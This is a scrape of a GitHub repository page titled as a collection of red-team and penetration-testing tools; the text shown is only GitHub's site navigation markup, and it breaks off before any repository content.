GitHub - A-poc/RedTeam-Tools: Tools and Techniques for Red Team / Penetration Testing
.25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"code_search","context":"product","tag":"link","label":"code_search_link_product_navbar"}" href="https://github.com/features/code-search"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-square color-fg-subtle mr-3"> <path d="M10.3 8.24a.75.75 0 0 1-.04 1.06L7.352 12l2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M2 3.75C2 2.784 2.784 2 3.75 2h16.5c.966 0 1.75.784 1.75 1.75v16.5A1.75 1.75 0 0 1 20.25 22H3.75A1.75 1.75 0 0 1 2 20.25Zm1.75-.25a.25.25 0 0 0-.25.25v16.5c0 .138.112.25.25.25h16.5a.25.25 0 0 0 .25-.25V3.75a.25.25 0 0 0-.25-.25Z"></path> </svg> <div> <div class="color-fg-default h4">Code Search</div> Find more, search less </div> </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="product-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="product-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"all_features","context":"product","tag":"link","label":"all_features_link_product_navbar"}" href="https://github.com/features"> All features </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" 
data-analytics-event="{"location":"navbar","action":"documentation","context":"product","tag":"link","label":"documentation_link_product_navbar"}" href="https://docs.github.com"> Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"github_skills","context":"product","tag":"link","label":"github_skills_link_product_navbar"}" href="https://skills.github.com"> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" 
data-analytics-event="{"location":"navbar","action":"blog","context":"product","tag":"link","label":"blog_link_product_navbar"}" href="https://github.blog"> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 pb-lg-3 mb-3 mb-lg-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-company-size-heading">By company 
size</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-company-size-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"enterprises","context":"solutions","tag":"link","label":"enterprises_link_solutions_navbar"}" href="https://github.com/enterprise"> Enterprises </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"small_and_medium_teams","context":"solutions","tag":"link","label":"small_and_medium_teams_link_solutions_navbar"}" href="https://github.com/team"> Small and medium teams </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"startups","context":"solutions","tag":"link","label":"startups_link_solutions_navbar"}" href="https://github.com/enterprise/startups"> Startups </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"nonprofits","context":"solutions","tag":"link","label":"nonprofits_link_solutions_navbar"}" href="/solutions/industry/nonprofits"> Nonprofits </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-use-case-heading">By use case</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-use-case-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devsecops","context":"solutions","tag":"link","label":"devsecops_link_solutions_navbar"}" href="/solutions/use-case/devsecops"> DevSecOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 
Link--secondary" data-analytics-event="{"location":"navbar","action":"devops","context":"solutions","tag":"link","label":"devops_link_solutions_navbar"}" href="/solutions/use-case/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ci_cd","context":"solutions","tag":"link","label":"ci_cd_link_solutions_navbar"}" href="/solutions/use-case/ci-cd"> CI/CD </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all_use_cases","context":"solutions","tag":"link","label":"view_all_use_cases_link_solutions_navbar"}" href="/solutions/use-case"> View all use cases </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-industry-heading">By industry</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-industry-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"healthcare","context":"solutions","tag":"link","label":"healthcare_link_solutions_navbar"}" href="/solutions/industry/healthcare"> Healthcare </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"financial_services","context":"solutions","tag":"link","label":"financial_services_link_solutions_navbar"}" href="/solutions/industry/financial-services"> Financial services </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" 
data-analytics-event="{"location":"navbar","action":"manufacturing","context":"solutions","tag":"link","label":"manufacturing_link_solutions_navbar"}" href="/solutions/industry/manufacturing"> Manufacturing </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"government","context":"solutions","tag":"link","label":"government_link_solutions_navbar"}" href="/solutions/industry/government"> Government </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all_industries","context":"solutions","tag":"link","label":"view_all_industries_link_solutions_navbar"}" href="/solutions/industry"> View all industries </a></li> </ul> </div> </div> <div class="HeaderMenu-trailing-link rounded-bottom-2 flex-shrink-0 mt-lg-4 px-lg-4 py-4 py-lg-3 f5 text-semibold"> <a href="/solutions"> View all solutions <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-right HeaderMenu-trailing-link-icon"> <path d="M6.22 3.22a.75.75 0 0 1 1.06 0l4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L9.94 8 6.22 4.28a.75.75 0 0 1 0-1.06Z"></path> </svg> </a> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Resources <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path 
d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="resources-topics-heading">Topics</span> <ul class="list-style-none f5" aria-labelledby="resources-topics-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ai","context":"resources","tag":"link","label":"ai_link_resources_navbar"}" href="/resources/articles/ai"> AI </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devops","context":"resources","tag":"link","label":"devops_link_resources_navbar"}" href="/resources/articles/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"security","context":"resources","tag":"link","label":"security_link_resources_navbar"}" href="/resources/articles/security"> Security </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"software_development","context":"resources","tag":"link","label":"software_development_link_resources_navbar"}" href="/resources/articles/software-development"> Software Development </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" 
data-analytics-event="{"location":"navbar","action":"view_all","context":"resources","tag":"link","label":"view_all_link_resources_navbar"}" href="/resources/articles"> View all </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="resources-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="resources-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"learning_pathways","context":"resources","tag":"link","label":"learning_pathways_link_resources_navbar"}" href="https://resources.github.com/learn/pathways"> Learning Pathways <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"events_amp_webinars","context":"resources","tag":"link","label":"events_amp_webinars_link_resources_navbar"}" href="https://resources.github.com"> Events & Webinars <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon 
color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ebooks_amp_whitepapers","context":"resources","tag":"link","label":"ebooks_amp_whitepapers_link_resources_navbar"}" href="https://github.com/resources/whitepapers"> Ebooks & Whitepapers </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"customer_stories","context":"resources","tag":"link","label":"customer_stories_link_resources_navbar"}" href="https://github.com/customer-stories"> Customer Stories </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"partners","context":"resources","tag":"link","label":"partners_link_resources_navbar"}" href="https://partner.github.com"> Partners <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 
1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"executive_insights","context":"resources","tag":"link","label":"executive_insights_link_resources_navbar"}" href="https://github.com/solutions/executive-insights"> Executive Insights </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 px-lg-4"> <div class="HeaderMenu-column"> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"github_sponsors","context":"open_source","tag":"link","label":"github_sponsors_link_open_source_navbar"}" href="/sponsors"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 
pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"the_readme_project","context":"open_source","tag":"link","label":"the_readme_project_link_open_source_navbar"}" href="https://github.com/readme"> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="open-source-repositories-heading">Repositories</span> <ul class="list-style-none f5" aria-labelledby="open-source-repositories-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"topics","context":"open_source","tag":"link","label":"topics_link_open_source_navbar"}" href="https://github.com/topics"> Topics </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"trending","context":"open_source","tag":"link","label":"trending_link_open_source_navbar"}" href="https://github.com/trending"> Trending </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"collections","context":"open_source","tag":"link","label":"collections_link_open_source_navbar"}" href="https://github.com/collections"> Collections </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 
py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Enterprise <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 px-lg-4"> <div class="HeaderMenu-column"> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"enterprise_platform","context":"enterprise","tag":"link","label":"enterprise_platform_link_enterprise_navbar"}" href="/enterprise"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-stack color-fg-subtle mr-3"> <path d="M11.063 1.456a1.749 1.749 0 0 1 1.874 0l8.383 5.316a1.751 1.751 0 0 1 0 2.956l-8.383 5.316a1.749 1.749 0 0 1-1.874 0L2.68 9.728a1.751 1.751 0 0 1 0-2.956Zm1.071 1.267a.25.25 0 0 0-.268 0L3.483 8.039a.25.25 0 0 0 0 .422l8.383 5.316a.25.25 0 0 0 .268 0l8.383-5.316a.25.25 0 0 0 0-.422Z"></path><path d="M1.867 12.324a.75.75 0 0 1 1.035-.232l8.964 5.685a.25.25 0 0 0 .268 0l8.964-5.685a.75.75 0 0 1 .804 1.267l-8.965 5.685a1.749 1.749 0 0 1-1.874 0l-8.965-5.685a.75.75 0 0 1-.231-1.035Z"></path><path d="M1.867 16.324a.75.75 0 0 1 1.035-.232l8.964 5.685a.25.25 0 0 0 .268 0l8.964-5.685a.75.75 0 0 1 .804 1.267l-8.965 5.685a1.749 1.749 0 0 1-1.874 0l-8.965-5.685a.75.75 0 0 1-.231-1.035Z"></path> </svg> <div> <div 
class="color-fg-default h4">Enterprise platform</div> AI-powered developer platform </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="enterprise-available-add-ons-heading">Available add-ons</span> <ul class="list-style-none f5" aria-labelledby="enterprise-available-add-ons-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"advanced_security","context":"enterprise","tag":"link","label":"advanced_security_link_enterprise_navbar"}" href="https://github.com/enterprise/advanced-security"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path> </svg> <div> <div class="color-fg-default h4">Advanced Security</div> Enterprise-grade security features </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"copilot_for_business","context":"enterprise","tag":"link","label":"copilot_for_business_link_enterprise_navbar"}" href="/features/copilot/copilot-business"> <svg aria-hidden="true" height="24" viewBox="0 0 24 
24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M23.922 16.992c-.861 1.495-5.859 5.023-11.922 5.023-6.063 0-11.061-3.528-11.922-5.023A.641.641 0 0 1 0 16.736v-2.869a.841.841 0 0 1 .053-.22c.372-.935 1.347-2.292 2.605-2.656.167-.429.414-1.055.644-1.517a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.499 1.132-3.368.397-.406.89-.717 1.474-.952 1.399-1.136 3.392-2.093 6.122-2.093 2.731 0 4.767.957 6.166 2.093.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086.23.462.477 1.088.644 1.517 1.258.364 2.233 1.721 2.605 2.656a.832.832 0 0 1 .053.22v2.869a.641.641 0 0 1-.078.256ZM12.172 11h-.344a4.323 4.323 0 0 1-.355.508C10.703 12.455 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a2.005 2.005 0 0 1-.085-.104L4 11.741v6.585c1.435.779 4.514 2.179 8 2.179 3.486 0 6.565-1.4 8-2.179v-6.585l-.098-.104s-.033.045-.085.104c-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.545-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.016.016Zm.641-2.935c.136 1.057.403 1.913.878 2.497.442.544 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.15.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.319-.862-2.824-1.025-1.487-.161-2.192.138-2.533.529-.269.307-.437.808-.438 1.578v.021c0 .265.021.562.063.893Zm-1.626 0c.042-.331.063-.628.063-.894v-.02c-.001-.77-.169-1.271-.438-1.578-.341-.391-1.046-.69-2.533-.529-1.505.163-2.347.537-2.824 1.025-.462.472-.705 1.179-.705 2.319 0 1.211.175 1.926.558 2.361.365.414 1.084.751 2.657.751 1.21 0 1.902-.394 2.344-.938.475-.584.742-1.44.878-2.497Z"></path><path d="M14.5 14.25a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Zm-5 0a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Z"></path> </svg> <div> <div class="color-fg-default h4">Copilot for business</div> Enterprise-grade AI features </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" 
data-analytics-event="{"location":"navbar","action":"premium_support","context":"enterprise","tag":"link","label":"premium_support_link_enterprise_navbar"}" href="/premium-support"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Premium Support</div> Enterprise-grade 24/7 support </div> </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <a class="HeaderMenu-link no-underline px-0 px-lg-2 py-3 py-lg-2 d-block d-lg-inline-block" data-analytics-event="{"location":"navbar","action":"pricing","context":"global","tag":"link","label":"pricing_link_global_navbar"}" href="https://github.com/pricing">Pricing</a> </li> </ul> </nav> <div class="d-flex flex-column flex-lg-row width-full flex-justify-end flex-lg-items-center text-center mt-3 mt-lg-0 text-lg-left ml-lg-3"> <qbsearch-input class="search-input" data-scope="repo:A-poc/RedTeam-Tools" 